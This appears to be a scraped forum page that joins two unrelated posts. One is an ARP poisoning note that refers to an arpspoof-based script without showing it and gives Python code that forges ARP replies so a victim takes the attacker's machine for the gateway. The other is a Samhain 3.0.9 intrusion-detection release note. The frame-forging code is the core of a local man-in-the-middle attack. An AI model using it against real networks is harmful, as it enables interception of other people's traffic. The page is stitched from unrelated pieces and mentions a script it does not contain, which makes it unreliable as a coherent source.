ARP poison script Sursa: https://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/
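The script delegates the actual poisoning to arpspoof; under the hood, the attack is just a stream of forged ARP replies telling the victim that the gateway's IP lives at the attacker's MAC. A minimal sketch of such a frame, built with only the Python standard library (all field values below are illustrative, not from the script):

```python
import socket
import struct

def forge_arp_reply(spoofed_ip, attacker_mac, victim_ip, victim_mac):
    """Ethernet frame + ARP reply claiming spoofed_ip (e.g. the gateway) is at attacker_mac."""
    eth = victim_mac + attacker_mac + struct.pack("!H", 0x0806)  # dst, src, EtherType = ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)              # Ethernet/IPv4, hlen/plen, op=2 (reply)
    arp += attacker_mac + socket.inet_aton(spoofed_ip)           # sender: attacker posing as the gateway
    arp += victim_mac + socket.inet_aton(victim_ip)              # target: the victim
    return eth + arp

frame = forge_arp_reply("192.168.1.1", b"\xaa" * 6, "192.168.1.100", b"\xbb" * 6)
assert len(frame) == 42                 # 14-byte Ethernet header + 28-byte ARP payload
assert frame[12:14] == b"\x08\x06"      # EtherType ARP
assert frame[20:22] == b"\x00\x02"      # opcode: reply
```

Actually sending such frames requires a raw socket (root privileges), which is exactly why the script insists on being run as root.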
  25. [h=1]Samhain 3.0.9![/h] by Mayuresh on December 22, 2012 For open source HIDS lovers, we have an updated release of Samhain: the bug-fixed version 3.0.9! Our original post about Samhain can be found here. Samhain 3.0.9 “The Samhain open source host-based intrusion detection system (HIDS) provides file integrity checking and logfile monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes. It has been designed to monitor multiple hosts with potentially different operating systems, providing centralized logging and maintenance, although it can also be used as a standalone application on a single host. Samhain is an open-source multiplatform application for POSIX systems (Unix, Linux, Cygwin/Windows).“ Official change log for Samhain 3.0.9:
Some build errors have been fixed.
The ‘probe’ command for the server has been fixed (clients could be erroneously omitted under certain conditions).
An option ‘IgnoreTimestampsOnly’ has been added to the Windows registry check (ignore changes if only the timestamp has changed).
Full scans requested by the inotify module will now only run at times configured for full scans anyway.
[h=3]Download Samhain:[/h] Samhain 3.0.9 – samhain-current.tar.gz/samhain-3.0.9.tar.gz Sursa: Samhain version 3.0.9! — PenTestIT